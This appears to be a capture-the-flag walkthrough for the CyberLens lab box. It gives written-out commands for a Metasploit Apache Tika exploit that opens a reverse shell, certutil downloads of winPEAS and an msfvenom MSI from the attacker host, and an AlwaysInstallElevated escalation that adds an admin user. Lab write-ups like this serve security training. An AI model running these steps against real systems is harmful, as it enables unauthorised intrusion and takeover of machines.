- Enumeration
- Port Scans
- nmap - TCP All ports scan
- HTTP
- Manual Enumeration
- User flag
- Finding the exploit
- Configuring the exploit
- Run the exploit
- Viewing the user.txt file
- Privilege Escalation
- Enumeration
- Exploitation
- Connection via RDP
- Generating the payload
- Download the payload
- Execute the payload
- Gaining Administrator access.
- Reset the Administrator password
- Viewing the admin.txt file
Enumeration
Port Scans
nmap - TCP All ports scan
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/htb/cyberlens/results/scans/_full_tcp_nmap.txt -oX /home/kali/thm/cyberlens/results/scans/xml/_full_tcp_nmap.xml cyberlens.thmPort | State | Service | Version |
80/tcp | open | http | Apache httpd 2.4.57 |
135/tcp | open | msrpc | Microsoft Windows RPC |
139/tcp | open | netbios-ssn | Microsoft Windows netbios-ssn |
445/tcp | open | microsoft-ds | |
3389/tcp | open | ms-wbt-server | Microsoft Terminal Services |
5985/tcp | open | http | Microsoft HTTPAPI httpd 2.0 |
47001/tcp | open | http | Microsoft HTTPAPI httpd 2.0 |
49664/tcp | open | msrpc | Microsoft Windows RPC |
49665/tcp | open | msrpc | Microsoft Windows RPC |
49666/tcp | open | msrpc | Microsoft Windows RPC |
49667/tcp | open | msrpc | Microsoft Windows RPC |
49668/tcp | open | msrpc | Microsoft Windows RPC |
49669/tcp | open | msrpc | Microsoft Windows RPC |
49670/tcp | open | msrpc | Microsoft Windows RPC |
49677/tcp | open | msrpc | Microsoft Windows RPC |
61777/tcp | open | http | Jetty 8.y.z-SNAPSHOT |
HTTP
Manual Enumeration
Viewing the main website shows it has the ability to read the metadata from any images that have been uploaded.
Uploading a basic image shows that the technology in use is likely tika.
User flag
Finding the exploit
Search metasploit for the technology tika.
search tika
Configuring the exploit
Select the first exploit from the previous results.
use 0
Configure the appropriate options
set RPORT 61777
set RHOSTS 10.10.163.68
set LHOST 10.4.25.196
set LPORT 4444
Run the exploit
run
sysinfo
Viewing the user.txt file
shell
whoami
type C:\Users\cyberlens\Desktop\user.txt
Privilege Escalation
Enumeration
Download the latest version of winpeas and setup a HTTP server in the same directory using python.
python3 -m http.server 80
Move back to the home directory in the existing shell.
cd %USERPROFILE%
Download winpeas.
certutil -f -urlcache http://10.4.25.196/winpeas.exe winpeas.exe
Run winpeas.
winpeas
Winpeas output shows that AlwaysInstallElevated is set. This means we can craft an msi file using msfvenom to elevate privileges.
Hints for the privilege escalation also mention that connecting via RDP will make your life easier.
Further enumeration shows us something that could be a user account password.
type Documents\Management\CyberLens-Management.txt
Exploitation
Connection via RDP
Connect via remmina (Or your preferred RDP client).
Enter the IP address and hit enter to connect.
Accept the Certificate by clicking on Yes.
Enter the credentials found earlier CyberLens / HackSmarter123.
When the connection is made click on the highlighted button below to make the RDP connection full screen.
Generating the payload
On the kali box type the below command to generate an MSI file.
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi
Download the payload
Open a command prompt window to download the payload. Ensure the payload is hosted in the same directory that the HTTP server is running from earlier.
certutil.exe -f -urlcache http://10.4.25.196/alwe.msi alwe.msi
Execute the payload
Run the payload.
alwe.msi
You will see an error but this can be ignored. Click on OK.
The payload should create a new user which is an Administrator. We can verify this with the below command.
net user
We can see that the user has been created.
Gaining Administrator access.
Use the runas command to open a new command prompt with the new user account. The header on the new command prompt window that pops up shows us that we are running in the new user context.
runas /user:rottenadmin cmd
P@ssword123!
We can verify that this user is now a member of the Administrators group with the below command.
net localgroup Administrators
If we attempt to view the Administrator flag we get access denied.
type C:\Users\Administrator\Desktop\admin.txt
Why? Well we checked before we are an Administrator but by default we don’t have access to other users profiles. Being an Administrator means that we can take ownership of another users files and then grant ourselves access. But this is just a CTF so we can reset the Administrator password.
Reset the Administrator password
Being that this is a CTF we don’t care about making changes so we can just reset the Administrator account password. Open the Local Users and Groups MMC.
lusrmgr.msc
Right click on the Administrator account and select Set Password…
Select Proceed.
Be sure to set a complex password then click on OK.
You should now see that the password has been set.
We can now run a new command prompt as the Administrator account with the newly reset password.
runas /user:Administrator cmd
Viewing the admin.txt file
We can now view the admin.txt file.
